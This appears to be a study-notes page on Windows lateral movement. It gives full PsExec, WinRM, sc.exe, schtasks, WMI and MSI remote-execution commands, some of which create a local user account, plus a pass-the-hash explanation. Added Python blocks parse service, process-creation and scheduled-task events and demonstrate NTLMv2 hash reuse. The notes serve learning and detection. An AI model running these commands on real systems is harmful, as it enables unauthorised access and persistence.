Contrxl
Theoretical Learning

Lateral Movement & Pivoting

Common techniques used to move laterally across a Windows network.

Spawning Processes Remotely

Psexec

  • Ports: 445/TCP (SMB)

  • Required Group Memberships: Administrators

PsExec, one of the Sysinternals tools, is the go-to choice when a process needs to be executed remotely. PsExec works as follows:

  1. Connect to the target and upload the PsExec service executable (PSEXESVC.exe).

  2. Create and start a service named PSEXESVC that points to C:\Windows\psexesvc.exe.

  3. Create named pipes to handle stdin/stdout/stderr.

To run PsExec, you need administrator credentials for the remote host and the command you wish to run.

Remote Process Creation Using WinRM

  • Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Remote Management Users

Windows Remote Management (WinRM) is a web-based protocol for sending PowerShell commands to remote hosts; many Windows Server installations run it by default. The following winrs command runs cmd on the target over WinRM:

winrs.exe -u:Administrator -p:Password -r:target cmd

The same can be achieved from PowerShell; to pass different credentials, however, a PSCredential object must be created first:

$username = 'Administrator'
$password = 'Password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

Enter-PSSession -Computername <TARGET> -Credential $credential

Invoke-Command -Computername <TARGET> -Credential $credential -ScriptBlock {whoami}

Remotely Creating Services Using SC

  • Ports: 135/TCP, 49152-65535/TCP (DCE/RPC) or 445/TCP (RPC over SMB Named Pipes) or 139/TCP (RPC over SMB Named Pipes)

  • Required Group Memberships: Administrators

Windows services can be used to run arbitrary commands: if a service is configured to run a normal application rather than a service binary, the application is executed and the service then fails. A service can be created on a remote host with sc.exe, a standard tool built into Windows.

When sc is used against a remote host, it tries to reach the Service Control Manager (SVCCTL) RPC service program in several ways:

  1. A connection attempt is made using DCE/RPC. The client connects to the Endpoint Mapper (EPM) on port 135, which catalogues the available RPC endpoints, and requests information on the SVCCTL program. The EPM responds with the IP address and port on which to reach SVCCTL, normally a dynamic port in the range 49152-65535.

  2. If that connection fails, it tries to reach SVCCTL via SMB named pipes on port 445 or 139.

The following commands create a service called Spooky:

sc.exe \\TARGET create Spooky binPath= "net user contrxl Pass /add" start= auto
sc.exe \\TARGET start Spooky

Once the service starts, the net user command is executed. To stop and delete the service afterwards:

sc.exe \\TARGET stop Spooky
sc.exe \\TARGET delete Spooky
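The defender-side artefact of both the PsExec sequence and the sc.exe service creation above is a System-log Event ID 7045 record ("A service was installed in the system"). The following Python is an added example, not part of the original notes or any project's code: it triages constructed 7045 records, flagging the PSEXESVC service name and any service whose ImagePath begins with a command such as net or cmd instead of a service binary. Field names follow the 7045 event's own data fields; the sample records are constructed. The same check applies to services created through WMI's Win32_Service class further down the page.

```python
"""Triage of Event ID 7045 records: the artefact left by PsExec (service
PSEXESVC) and by sc.exe create with a non-service binPath. Added example;
sample records are constructed."""
import ntpath

# Programs that are never legitimate service binaries: a 7045 whose ImagePath
# starts with one of these is the "binPath= \"net user ...\"" pattern.
LOLBINS = {
    "net", "net.exe", "net1", "net1.exe", "cmd", "cmd.exe",
    "powershell", "powershell.exe", "pwsh", "pwsh.exe", "wmic", "wmic.exe",
    "rundll32", "rundll32.exe", "mshta", "mshta.exe", "regsvr32", "regsvr32.exe",
}

# Directories in which service binaries normally live (lower-case, trailing \).
SYSTEM_DIRS = (
    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
    "c:\\program files\\", "c:\\program files (x86)\\",
)

# Constructed sample 7045 events in the field layout the event itself uses.
SAMPLE_7045 = [
    {"ServiceName": "PSEXESVC", "ImagePath": r"C:\Windows\PSEXESVC.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooky", "ImagePath": "net user contrxl Pass /add",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Updater", "ImagePath": r"C:\Users\Public\upd.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]


def executable_of(image_path: str) -> str:
    """Return the executable part of an ImagePath, honouring a quoted path."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def triage_7045(event: dict) -> list:
    """Return the list of reasons a 7045 record deserves analyst attention."""
    findings = []
    exe = executable_of(event["ImagePath"])
    base = ntpath.basename(exe).lower()
    if event["ServiceName"].upper() == "PSEXESVC" or base == "psexesvc.exe":
        findings.append("PsExec service (PSEXESVC) installed")
    if base in LOLBINS:
        findings.append(f"ImagePath runs {base} instead of a service binary (sc create pattern)")
    elif not exe.lower().startswith(SYSTEM_DIRS):
        findings.append("service binary outside the standard system/program directories")
    return findings


def flagged_services(events) -> dict:
    """Map ServiceName -> findings for every record that produced at least one."""
    out = {}
    for ev in events:
        reasons = triage_7045(ev)
        if reasons:
            out[ev["ServiceName"]] = reasons
    return out


if __name__ == "__main__":
    for name, reasons in flagged_services(SAMPLE_7045).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Running the block flags PSEXESVC, Spooky and Updater and leaves the Spooler and the quoted Program Files path alone; a renamed PsExec service binary defeats the name check, which is why the ImagePath and directory checks are kept separate.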

Creating Scheduled Tasks Remotely

Scheduled tasks can be created and run remotely using schtasks. To create a task named Spooky:

schtasks /s TARGET /RU "SYSTEM" /create /tn "Spooky" /tr "cmd" /sc ONCE /sd 01/01/1970 /st 00:00

schtasks /s TARGET /run /TN "Spooky"

schtasks /s TARGET /TN "Spooky" /DELETE /F

Connecting to WMI from PowerShell

Before connecting to WMI (Windows Management Instrumentation) from PowerShell, a PSCredential object holding our username and password must be created:

$username = 'Administrator';
$password = 'Password';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

A WMI session can be created using one of the following protocols:

  • DCOM: RPC over IP using port 135/TCP and ports 49152-65535/TCP

  • Wsman: WinRM for connecting using ports 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

To establish a WMI session from PowerShell, we use the following:

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop

Remote Process Creation Using WMI

  • Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Administrators

A process can be spawned remotely from PowerShell by leveraging WMI: a request is sent to the Create method of the Win32_Process class over the session created above:

$command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value contrxl";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = $command
}

WMI won't let you see the output of the command and creates the required process silently. On legacy systems, this can be done from CMD with WMIC:

wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" 
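Each channel described so far leaves a distinctive parent process on the target: PSEXESVC.exe for PsExec, wsmprovhost.exe (PowerShell remoting) or winrshost.exe (winrs) for WinRM, services.exe for a service started with sc, the Task Scheduler's svchost.exe instance for schtasks, and WmiPrvSE.exe for WMI's Win32_Process.Create or wmic. The following Python, an added example rather than code from the original notes, classifies constructed Sysmon Event ID 1 (process creation) records by that parent. It assumes Sysmon is deployed with its default field names; the sample records are constructed, modelled on the commands in these notes.

```python
"""Classify Sysmon Event ID 1 (process creation) records by the parent process
that spawned them; the parent reveals which remote-execution channel was used.
Added example; assumes Sysmon with its default field names. Sample records are
constructed."""
import ntpath

# Parent image -> remote-execution channel it implies.
REMOTE_PARENTS = {
    "psexesvc.exe": "PsExec (service PSEXESVC)",
    "wsmprovhost.exe": "WinRM PowerShell remoting (Enter-PSSession / Invoke-Command)",
    "winrshost.exe": "WinRM (winrs.exe)",
    "wmiprvse.exe": "WMI (Win32_Process.Create / wmic process call create)",
}

# Children worth attention when started through one of these channels.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe", "whoami.exe"}

SAMPLE_SYSMON = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "ParentCommandLine": r"C:\Windows\PSEXESVC.exe", "CommandLine": "cmd",
     "User": "DOMAIN\\Administrator"},
    {"Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "ParentCommandLine": r"C:\Windows\system32\wsmprovhost.exe -Embedding",
     "CommandLine": "whoami", "User": "DOMAIN\\Administrator"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentCommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
     "CommandLine": r"powershell.exe -Command Set-Content -Path C:\text.txt -Value contrxl",
     "User": "DOMAIN\\Administrator"},
    {"Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": r"C:\Windows\system32\services.exe",
     "CommandLine": "net user contrxl Pass /add", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
     "CommandLine": "cmd", "User": "NT AUTHORITY\\SYSTEM"},
    # Benign: the WMI provider host itself being launched by DcomLaunch.
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",
     "User": "NT AUTHORITY\\NETWORK SERVICE"},
    # Benign: a user opening an editor from the desktop.
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE", "CommandLine": "notepad",
     "User": "DOMAIN\\alice"},
]


def classify(event: dict):
    """Return (channel, child) when the parent is a remote-execution host, else None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent in REMOTE_PARENTS:
        return REMOTE_PARENTS[parent], child
    # services.exe starting a shell or net.exe is the "sc create" / Win32_Service pattern.
    if parent == "services.exe" and child in SHELLS:
        return "Service Control Manager ran a non-service binary (sc create / Win32_Service)", child
    # The Task Scheduler service lives in the svchost instance started with "-s Schedule";
    # legitimate tasks also launch shells, so this class needs baselining.
    if parent == "svchost.exe" and "schedule" in event.get("ParentCommandLine", "").lower() \
            and child in SHELLS:
        return "Task Scheduler (schtasks / Register-ScheduledTask)", child
    return None


def remote_executions(events) -> list:
    """One dict per remotely spawned process: channel, child, whether it is a shell, user, command line."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result:
            channel, child = result
            hits.append({"channel": channel, "child": child, "shell": child in SHELLS,
                         "user": ev["User"], "cmdline": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for h in remote_executions(SAMPLE_SYSMON):
        print(f"{h['channel']:<75} {h['user']:<30} {h['cmdline']}")
```

The two benign records are the important negative cases: WmiPrvSE.exe is itself started by the DcomLaunch svchost on every WMI query, so only its children, not its own creation, indicate remote process creation.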

Creating Services Remotely with WMI

  • Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Administrators

To create a service called "contrxl":

Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "contrxl";
DisplayName = "contrxl";
PathName = "net user contrxl Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}

The service can then be retrieved and started using:

$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'contrxl'"

Invoke-CimMethod -InputObject $Service -MethodName StartService

Finally, the service can be stopped and deleted with:

Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete

Creating Scheduled Tasks Remotely with WMI

  • Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Administrators

To create and execute a scheduled task:

# Payload must be split into the executable and its arguments
$Command = "cmd.exe"
$Arguments = "/c net user contrxl aSdf1234 /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Arguments
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "contrxl"
Start-ScheduledTask -CimSession $Session -TaskName "contrxl"

And then to delete the task once done:

Unregister-ScheduledTask -CimSession $Session -TaskName "contrxl"
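Both the schtasks commands earlier and the Register-ScheduledTask call above leave a Security-log Event ID 4698 record ("A scheduled task was created") whose TaskContent field carries the task XML. The following Python is an added example, not from the original notes, that parses constructed 4698 records and flags the pattern shown in both sections: a task running as SYSTEM, an action that launches a shell, and a run-once trigger dated in the past so the task only ever runs when started by hand. The XML is constructed in the Task Scheduler schema that real events embed.

```python
"""Inspect Event ID 4698 records for the remotely created task pattern:
runs as SYSTEM, launches a shell, run-once trigger dated in the past.
Added example; sample events and their TaskContent XML are constructed."""
import ntpath
import xml.etree.ElementTree as ET
from datetime import datetime

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh.exe", "net", "net.exe"}


def task_xml(user: str, command: str, args: str, start: str) -> str:
    """Build TaskContent XML in the shape schtasks /create writes (constructed)."""
    return (
        f'<Task version="1.2" xmlns="{NS[1:-1]}">'
        f"<Triggers><TimeTrigger><StartBoundary>{start}</StartBoundary>"
        "<Enabled>true</Enabled></TimeTrigger></Triggers>"
        f'<Principals><Principal id="Author"><UserId>{user}</UserId>'
        "<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
        f'<Actions Context="Author"><Exec><Command>{command}</Command>'
        f"<Arguments>{args}</Arguments></Exec></Actions></Task>"
    )


# Constructed 4698 records: the task from these notes and a routine vendor updater.
SAMPLE_4698 = [
    {"SubjectUserName": "Administrator", "TaskName": "\\Spooky",
     "TaskContent": task_xml("S-1-5-18", "cmd", "/c net user contrxl aSdf1234 /add",
                             "1970-01-01T00:00:00")},
    {"SubjectUserName": "alice", "TaskName": "\\Vendor\\Update",
     "TaskContent": task_xml("S-1-5-21-1111-2222-3333-1001",
                             r"C:\Program Files\Vendor\update.exe", "/silent",
                             "2024-03-01T09:00:00")},
]


def parse_task(xml_text: str) -> dict:
    """Pull the principal, action and first time trigger out of TaskContent."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path)
        return el.text if el is not None and el.text else ""

    return {
        "user": text(f".//{NS}Principal/{NS}UserId"),
        "command": text(f".//{NS}Exec/{NS}Command"),
        "arguments": text(f".//{NS}Exec/{NS}Arguments"),
        "start": text(f".//{NS}TimeTrigger/{NS}StartBoundary"),
    }


def triage_4698(event: dict) -> list:
    """Return the reasons a task-creation record deserves attention."""
    t = parse_task(event["TaskContent"])
    findings = []
    if t["user"].upper() in SYSTEM_IDS:
        findings.append("task runs as SYSTEM")
    cmd = ntpath.basename(t["command"]).lower()
    if cmd in SHELLS:
        findings.append(f"action launches {cmd} {t['arguments']}".rstrip())
    if t["start"] and datetime.fromisoformat(t["start"]).year < 2000:
        findings.append(f"run-once trigger dated {t['start']}: task only runs when started manually")
    return findings


def flagged_tasks(events) -> dict:
    """Map TaskName -> findings for records that produced at least one."""
    return {ev["TaskName"]: triage_4698(ev) for ev in events if triage_4698(ev)}


if __name__ == "__main__":
    for name, reasons in flagged_tasks(SAMPLE_4698).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The 1970 StartBoundary is the give-away for the `/sc ONCE /sd 01/01/1970` form above: the trigger can never fire on its own, so the task exists purely to be run and deleted by its creator.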

Installing MSI Packages Through WMI

  • Ports: 135/TCP, 49152-65535/TCP (DCERPC), 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

  • Required Group Memberships: Administrators

If an MSI package is copied to the target system, WMI can be used to attempt to install it using:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

This can be achieved on legacy systems with:

wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi

Use of Alternate Authentication Material

Alternate authentication material refers to a piece of data that can be used to access a Windows account without the password. This is possible because of how some Windows authentication protocols, such as NTLM and Kerberos, work.

NTLM authentication works as follows:

  1. The client sends an authentication request to the server it wants to access.

  2. The server generates a random number and sends it to the client as a challenge.

  3. The client combines its NTLM password hash with the challenge (and other known data) to generate a response to the challenge, and sends it back to the server for verification.

  4. The server forwards both the challenge and the response to the Domain Controller for verification.

  5. The Domain Controller uses the challenge to recalculate the response and compares it to the response received from the client. If they match, the client is authenticated; otherwise access is denied.

  6. The server forwards the authentication result to the client.

Pass-the-Hash

When extracting credentials from a host on which we have administrative privileges, we may end up with NTLM hashes that cannot be cracked. These can still be used in a pass-the-hash attack to authenticate successfully without the actual password. Hash extraction can be performed with a tool such as mimikatz, reading the local SAM or extracting hashes from LSASS.
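To make the six NTLM steps above concrete, and to show why the hash alone suffices for pass-the-hash, the following Python walks through an NTLMv2 exchange with both sides computed: the client's response in step 3 and the Domain Controller's recomputation in step 5. It is an added example rather than anything from the original notes; the NT hash, user, domain and challenges are constructed values, not real account material.

```python
"""Worked NTLMv2 challenge/response. The NT hash is the only secret on either
side, so a client holding just the hash authenticates exactly like one holding
the password. Added example; all values are constructed."""
import hashlib
import hmac
import struct

USER, DOMAIN = "contrxl", "DOMAIN"
# NT hash = MD4(UTF-16LE(password)); this 16-byte value is made up for the example.
NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
OTHER_HASH = bytes.fromhex("ffeeddccbbaa99887766554433221100")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain in UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes = b"") -> bytes:
    """NTLMv2_CLIENT_CHALLENGE (MS-NLMP): type bytes, reserved, time, client nonce, AV pairs."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def client_response(nt_hash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """Step 3: the client needs only the NT hash, the server challenge and its own blob."""
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def dc_verify(stored_nt_hash: bytes, user: str, domain: str,
              server_challenge: bytes, response: bytes) -> bool:
    """Step 5: the DC recomputes the proof from its stored NT hash and the blob the client sent."""
    proof, blob = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def run_exchange(client_hash: bytes, stored_hash: bytes) -> bool:
    """Full exchange with fixed (constructed) challenges so the result is reproducible."""
    server_challenge = bytes.fromhex("0123456789abcdef")                  # step 2
    blob = build_blob(0x01D9F00000000000, bytes.fromhex("fedcba9876543210"))
    response = client_response(client_hash, USER, DOMAIN, server_challenge, blob)  # step 3
    return dc_verify(stored_hash, USER, DOMAIN, server_challenge, response)         # steps 4-5


if __name__ == "__main__":
    print("client hash matches the DC's copy:", run_exchange(NT_HASH, NT_HASH))   # True
    print("client hash does not match:       ", run_exchange(OTHER_HASH, NT_HASH))  # False
```

Nothing on the client side ever touches the password: client_response takes the NT hash directly and the DC checks it against the same stored hash. That is the defensive lesson of the Pass-the-Hash section: an NT hash read from the SAM or LSASS must be protected exactly as a password would be.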

Last updated 4 months ago
